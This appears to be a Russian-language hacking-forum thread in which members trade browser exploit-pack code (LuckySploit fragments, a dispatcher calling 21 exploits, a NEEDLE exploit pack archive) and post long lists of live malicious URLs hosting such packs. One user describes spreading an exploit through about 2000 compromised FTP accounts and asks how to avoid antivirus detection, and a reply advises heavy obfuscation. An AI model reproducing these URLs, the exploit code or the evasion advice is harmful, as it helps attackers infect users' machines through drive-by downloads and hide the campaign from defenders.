var scriptTag2 = document.createElement('script');
scriptTag2.src = '?' + res2;
document.body.appendChild(scriptTag2);

Код: 
nextkey = '';
k = '';
attack_level = 0;;
try {
  f = 'Welcome to LuckySploit:) \n ITS TOASTED';
}
catch (e){
}
 
Mail2k, py4ka, el-
Мужики, будьте добры, засовывайте кодес в атачи. оч неудобно смотреть страницу

Mail2k
вот оно-же самое с комантами как росскрывать
http://xss.pro/index.php?topic=1...indpost&p=99786

py4ka
откуда у тебя этот файлег с линками?


ЗЫ: мне вот интересно стало, лаки использующих рса.енкрипт становится все больше и больше, всего она одного вида. где используется такой криптор, кто знает? может ктото видел в какой-либо связке это
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Предлагаю в эту тему постить ссылки на который сидят звери.

ЗЫ Без антивирей неоткрывайте!!!

http://www.galactic.org.ua/pr-nep/
опера запустила акробат который пробила и в вин-ссисвов записало файл ~.exe и он цеплянулся бы к кернелу но виста оказалась 64 Laughing
 
Как рас в эту тему, пройдя по одному линку я увидел следующее окошко:
94376070.png

Видимо на компьютере "прокси" установлена антивирусная система "NOD32".
Что самое примечательное, на этой ссылке тестируется эксплоит, версия эксплоита обнаруживаемая антивирусами висела минут 15 и то во время обновления функции скрытия (примерно середина дня), так же ссылка распространялась через ftp акки, встраивалась элементарная функция для выполнения Java скрипта, всего порядка 2000 ftp аккаунтов разных стран (US,DE,GB,ES,RU,UA & etc...).
Забавно, такое окно появляется только если зайти в папку со скриптами, если делать запрос в корневую директорию то страница отлично открывается.

Внимание! Вопрос!
Что это за окошко? Где спалилась ссылка? Да и собственно кто что думает на эту тему, как лечить это и как не допустить этого в будущем (aka "Меры предосторожности")?

На тему как лечить, самое элементарное - это сменить директорию/домен, единственный минус - перелопатить 2к акков что бы изменить код.

p.s. сорри, ссылочку особо палить не хочется.
 
да, похоже спалился через нодовую систему обмена информацией, какая-то сеть у них там есть, не помню честно. через неё скорее всего и ушло. а совет это делать максимульную обфускацию что-бы пока запущено не было, ничего не спалилось
 
Снял еще какой-то щыт.
21 сплойт.
Код: 
  	if (
    mdac() ||
    office() ||
    dl() ||
    pdf() ||
    wme() ||
    wfi() ||
    com() ||
    ya1() ||
    ya2() ||
    fb() ||
    mdss() ||
    creative() ||
    wks() ||
    ogame() ||
    ca() ||
    buddy() ||
    gomweb() ||
    xmlcore() ||
    quick() ||
    real() ||
    ntaudio()
    ) {}
видел правда где-то уже, но где щас не вспомню.
:zns5: Скачать|Download
:zns3: Пароль: dl.org

Одинокий Волк
вот то зверье, которые ты выкладывал последним. расшифровался предельно просто, видимо я уставший был ужасно


2 All
Перед выкладыванием сплойтов, связок, прочтите плз первый пост. Оч прошу.
:zns5: Скачать|Download
:zns3: Пароль: dl.org
 
Новый вид зверья, раньше такого нигде не встречал
хттп://1zs0ewvqcget52rl1z1n.cn/s_t_t.php
хттп://2d2deozghamea1m1ifn3.cn/s_t_t.php
хттп://dcz9ubei212vp3nrca5i.cn/s_t_t.php
хттп://ddvrrflabpqcuoaexpwp.cn/s_t_t.php
хттп://dihbgbwqryuolfbebgme.cn/s_t_t.php
хттп://egntxselsaossawilurx.cn/s_t_t.php
хттп://fcsvjiajnerwjjmtnfzu.cn/s_t_t.php
хттп://hsyzpbavkojdqclhnoqz.cn/s_t_t.php
хттп://ivdqvmbxktixdpleamjg.cn/s_t_t.php
хттп://jetvokzbdgktxubiiphn.cn/s_t_t.php
хттп://lmempodfzrqqkteyupar.cn/s_t_t.php
хттп://lufwhtelkadvrtaukqjo.cn/s_t_t.php
хттп://qjiv7qj4irh2f1o2v8sm.cn/s_t_t.php
хттп://tckeblkiumuhysrwqlev.cn/s_t_t.php
хттп://xbfnyukgdoqrjrsfmcdm.cn/s_t_t.php
хттп://xpehbam.cn/s_t_t.php
хттп://zjjrrhhuokjxgmulisxs.cn/s_t_t.php
хттп://znchygdrmelzejjvofji.cn/s_t_t.php
хттп://zteersxhgcddtfktecrq.cn/s_t_t.php
+ небольшой апдейтец
хттп://234954382524.cn - uniq
хттп://438723847234.cn/sem/index.php - очень похоже на юник, но сильно модифено
хттп://adscounter.cn/package/
хттп://s1.s2.s3.s4.yahoo.com.longebook.cn/qq/ - интересненько
хттп://foxbelive.ru/pic1/
хттп://foxxpriv.ru/pic1/
хттп://g00gle-analyze.com/slg2/ - похоже на обфус юник
хттп://hunters-of-darkness.de/cgi-stat/index.php
хттп://jimmgoland.1sthost.org/filter/
хттп://ncsmichigan.com/images/pack/index.php - uniq?
хттп://telenet.kz/kabel/cer/ - hmm
хттп://chriscleaningco.com/images/
хттп://gifts2009.net/aga/in.php
хттп://gold-sutra.info/gpack/
хттп://php4php.xtreemhost.com/admin/
хттп://prostolab.net/inf/index.php
хттп://russiannews.ru/arabic/data/news/upload/exp/
хттп://prostolab.net/inf/index.php
nepaxek-domain.cn/pabl/index.php - YES pack
www.thebestlog.org/cruz/ - uniq
weblife.net23.net
thelegion74.com/yu5/index.php - uniq pack good enc & obf
vippif.com/fiesta/ -
piratik.biz/exp5/index.php - uniq
piratik.biz/exp/index.php - uniq
leepe.cn/eng/index.php - uniq
leepe.cn/cat/index.php - uniq
lafi.babjr.cn/index.php - uniq
biglendlive.info/hitstat/index.php - uniq
89.248.172.156/660/index.php - ???
google-search.ru/spl/
216.12.168.138/1/
gimnow.org/images/
dreams.co.il/images/z/static.php -!!!
derenfop.cn/zer3/
derenfop.cn/van6/
derenfop.cn/van3/
daratop.cn/dam6/
cutalot.cn/fi/
ciancia.org/help/z/static.php
ftpgeoit.com/unik/
goooodbill.cn/unig/ - !!!
beautywithbeads.com/fire/
xazlon.cn/cgi/index.php
amerika.by/libraries/tcpdf/images/spl/cfg/fies/
7ioi.biz/fo/
783456788839.cn/
porno-tube-x.com/l/berror/id/3913960/
loyaltube.com/tube/
 
Снял еще какой-то щыт.
21 сплойт.
Код|Code
if (
mdac() ||
office() ||
dl() ||
pdf() ||
wme() ||
wfi() ||
com() ||
ya1() ||
ya2() ||
fb() ||
mdss() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
) {}

видел правда где-то уже, но где щас не вспомню.
software.gif Скачать|Download
topic.gif Пароль: dl.org

Одинокий Волк
вот то зверье, которые ты выкладывал последним. расшифровался предельно просто, видимо я уставший был ужасно


2 All
Перед выкладыванием сплойтов, связок, прочтите плз первый пост. Оч прошу.
software.gif Скачать|Download
topic.gif Пароль: dl.org
Перезалейте пожалуйста...
 
NEEDLE exploit pack
Код: 
video.fbookarchive.com/index.php
user agent : Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
скрин входа в админку

Ну и то что успел снять....

pass:dl.org
Возможно кто-то слыхал о даном паке?
 

Вложения

  • NEEDLE_exp_pack.rar
    9.9 КБ · Просмотры: 33
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх